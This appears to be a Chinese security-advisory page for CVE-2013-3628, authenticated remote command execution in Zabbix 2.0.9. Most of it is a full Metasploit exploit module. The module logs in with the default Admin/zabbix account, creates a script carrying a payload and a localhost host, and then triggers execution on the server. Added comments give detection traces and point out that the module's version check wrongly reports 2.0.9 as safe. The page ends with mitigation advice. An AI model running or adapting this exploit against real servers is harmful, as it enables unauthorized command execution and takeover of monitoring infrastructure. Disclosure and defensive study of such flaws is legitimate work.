Zabbix任意命令执行漏洞
信息来源:Brandon Perry 发表日期:2013-10-16 17:12:00
ZABBIX是一个CS结构的分布式网络监控系统。
Zabbix 2.0.9及其他版本允许管理员创建脚本并在主机上运行,经过身份验证的攻击者可利用此漏洞在Zabbix主机上运行恶意脚本。
BUGTRAQ-ID:63453
CVE-ID:2013-3628
受影响系统:
ZABBIX ZABBIX v2.0.9
测试方法:
警告!以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require \'msf/core\'
# NOTE(review): the \' and doubled-backslash sequences in this listing look like
# escaping introduced when the page was generated; the code is kept exactly as
# published.
#
# Metasploit remote exploit module for CVE-2013-3628 (Zabbix authenticated
# command execution). Using a logged-in frontend session it creates a script
# whose command is the payload, creates a host with a 127.0.0.1 interface, and
# requests scripts_exec.php for that host/script pair.
#
# Defender notes:
# - Every step goes through the regular frontend pages (scripts.php, hosts.php,
#   scripts_exec.php) with valid credentials, so the practical exposure is who
#   can log in with rights to create scripts and hosts.
# - USERNAME/PASSWORD default to Admin/zabbix, the stock Zabbix frontend
#   account; changing that password and restricting access to the frontend are
#   the first mitigations.
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
# Registers the module metadata (name, references, command-payload
# constraints, unix/linux platform) and the USERNAME, PASSWORD and TARGETURI
# options.
#
# @param info [Hash] metadata overrides passed through update_info
def initialize(info={})
super(update_info(info,
\'Name\' => \'Zabbix Authenticated Remote Command Execution\',
\'Description\' => %q{
ZABBIX allows an administrator to create scripts that will be run on hosts.
An authenticated attacker can create a script containing a payload, then a host
with an IP of 127.0.0.1 and run the abitrary script on the ZABBIX host.
This module was tested againt Zabbix v2.0.9.
},
\'License\' => MSF_LICENSE,
\'Author\' =>
[
\'Brandon Perry <bperry.volatile[at]gmail.com>\' # Discovery / msf module
],
\'References\' =>
[
[\'CVE\', \'2013-3628\'],
[\'URL\', \'https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats\']
],
\'Payload\' =>
{
\'Compat\' =>
{
\'PayloadType\' => \'cmd\',
\'RequiredCmd\' => \'generic perl ruby bash telnet python\',
}
},
\'Platform\' => [\'unix\', \'linux\'],
\'Arch\' => ARCH_CMD,
\'Targets\' => [[\'Automatic\',{}]],
\'DisclosureDate\' => \'Oct 30 2013\',
\'DefaultTarget\' => 0
))
# The credential defaults below are the stock Zabbix frontend account.
register_options(
[
OptString.new(\'USERNAME\', [ true, "Username to authenticate with", \'Admin\']),
OptString.new(\'PASSWORD\', [ true, "Password to authenticate with", \'zabbix\']),
OptString.new(\'TARGETURI\', [ true, "The URI of the Zabbix installation", \'/zabbix/\'])
], self.class)
end
# Requests index.php under TARGETURI and looks for a
# "Zabbix <version> Copyright" string in the response body.
#
# Returns Exploit::CheckCode::Unknown when there is no response or the status
# is not 200, Vulnerable when the captured version string compares between
# "2.0.0" and "2.0.8", and Safe in every other case.
#
# NOTE(review): a Safe result is not evidence that a host is unaffected. The
# module description says it was tested against v2.0.9, which this range
# excludes, and a body that does not match the pattern at all also falls
# through to Safe. Do not use this result for asset triage.
def check
init = send_request_cgi({
\'method\' => \'GET\',
\'uri\' => normalize_uri(target_uri.path, "/index.php")
})
if !init or init.code != 200
print_error("Could not connect to server")
return Exploit::CheckCode::Unknown
end
# The pattern captures a single-digit patch level; the comparison below is a
# string comparison on that capture.
if init.body =~ /Zabbix (2\\.0\\.(\\d)) Copyright/
if $1 >= "2.0.0" and $1 <= "2.0.8"
print_good("Version #{$1} is vulnerable.")
return Exploit::CheckCode::Vulnerable
end
end
return Exploit::CheckCode::Safe
end
# Logs in, reads the session's sid from the dashboard, creates a script and a
# host through the frontend forms, then requests execution of that script
# against that host. Each step calls fail_with when the expected status code
# or page content is missing.
#
# What this leaves behind (useful for detection and incident response):
# - frontend requests in this order carrying one session cookie: the login
#   POST, GET dashboard.php, POST scripts.php, POST hosts.php, and
#   GET scripts_exec.php with execute=1;
# - one script and one host, each named with 18 random letters, the host with
#   an interface of 127.0.0.1 port 10050. Nothing in this method deletes
#   either object, so both remain in the Zabbix configuration afterwards.
def exploit
# The login POST is built by hand and sent to the literal path '/zabbix/';
# TARGETURI is only used for the later requests.
c = connect
req = c.request_cgi({
\'method\' => \'POST\',
\'uri\' => \'/zabbix/\',
\'data\' => \'request=&name=\' << datastore[\'USERNAME\'] << \'&password=\' << datastore[\'PASSWORD\'] << \'&enter=Sign+in\'
})
# The serialized request's "Host:" text is replaced so that it carries RHOST.
login = c.send_recv(req.to_s.sub("Host:", "Host: " << datastore["RHOST"]))
# A 302 response is treated as a successful login.
if !login or login.code != 302
fail_with("Login failed")
end
# The Set-Cookie value from the login response is reused on every later request.
sess = login.headers[\'Set-Cookie\']
dash = send_request_cgi({
\'method\' => \'GET\',
\'uri\' => normalize_uri(target_uri.path, \'/dashboard.php\'),
\'cookie\' => sess
})
if !dash or dash.code != 200
fail_with("Dashboard failed")
end
# Take the first 16-character sid found in the dashboard HTML; the form posts
# and the final request below all carry it.
sid = \'\'
dash.body.each_line do |line|
if line =~ /&sid=(.{16})\\">/
sid = $1
break
end
end
if sid == \'\'
fail_with("Could not get sid")
end
# Script creation: random 18-letter name, with the encoded payload as the
# script's command.
# NOTE(review): execute_on => 1 presumably selects execution on the Zabbix
# server rather than on an agent; confirm against the Zabbix script form.
script_title = rand_text_alpha(18)
post = {
\'sid\' => sid,
\'form_refresh\' => 3,
\'form\' => \'Create+script\',
\'name\' => script_title,
\'type\' => 0,
\'execute_on\' => 1,
\'command\' => payload.encoded,
\'commandipmi\' => \'\',
\'description\' => \'\',
\'usrgrpid\' => 0,
\'groupid\' => 0,
\'access\' => 2,
\'save\' => \'Save\'
}
resp = send_request_cgi({
\'method\' => \'POST\',
\'uri\' => normalize_uri(target_uri.path, \'/scripts.php\'),
\'vars_post\' => post,
\'cookie\' => sess
})
if !resp or resp.code != 200
fail_with("Error creating script")
end
# The new script's numeric id is read from the link in the response whose
# text is the random script name.
script_id = \'\'
if resp.body =~ /scriptid=(\\d{1,8})&sid=#{sid}\\">#{script_title}/
script_id = $1
else
fail_with("Could not get the script id")
end
# Host creation: random 18-letter host name with a single interface at
# 127.0.0.1 port 10050.
host = rand_text_alpha(18)
post = {
\'sid\' => sid,
\'form_refresh\' => 1,
\'form\' => \'Create+host\',
\'host\' => host,
\'visiblename\' => host,
\'groups_left\' => 4,
\'newgroup\' => \'\',
\'interfaces[1][isNew]\' => true,
\'interfaces[1][interfaceid]\' => 1,
\'interfaces[1][type]\' => 1,
\'interfaces[1][ip]\' => \'127.0.0.1\',
\'interfaces[1][dns]\' => \'\',
\'interfaces[1][useip]\' => 1,
\'interfaces[1][port]\' => 10050,
\'mainInterfaces[1]\' => 1,
\'proxy_hostid\' => 0,
\'status\' => 0,
\'ipmi_authtype\' => -1,
\'ipmi_privilege\' => 2,
\'ipmi_username\' => \'\',
\'ipmi_password\' => \'\',
\'macros[0][macro]\' => \'\',
\'macros[0][value]\' => \'\',
\'inventory_mode\' => -1,
\'save\' => \'Save\',
\'groups[4]\' => 4
}
resp = send_request_cgi({
\'method\' => \'POST\',
\'uri\' => normalize_uri(target_uri.path, \'/hosts.php\'),
\'vars_post\' => post,
\'cookie\' => sess
})
if !resp or resp.code != 200
fail_with("Error creating new host")
end
# The new host's numeric id is read from the update link in the response
# whose text is the random host name.
hostid = \'\'
if resp.body =~ /hosts.php\\?form=update&hostid=(\\d{1,12})&groupid=(\\d)&sid=#{sid}\\">#{host}/
hostid = $1
else
fail_with("Could not get the host id")
end
# Final request: asks the frontend to execute the created script against the
# created host. The response is not inspected.
send_request_cgi({
\'method\' => \'GET\',
\'uri\' => normalize_uri(target_uri.path, "/scripts_exec.php?execute=1&hostid=#{hostid}&scriptid=#{script_id}&sid=#{sid}"),
\'cookie\' => sess
})
end
end
解决办法:安装厂商补丁(发布本文时厂商尚未提供,见下文)。在补丁可用之前,请修改Zabbix前端的默认管理员口令(上述模块默认使用Admin/zabbix),并限制对Web前端的访问。
厂商补丁:
ZABBIX
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: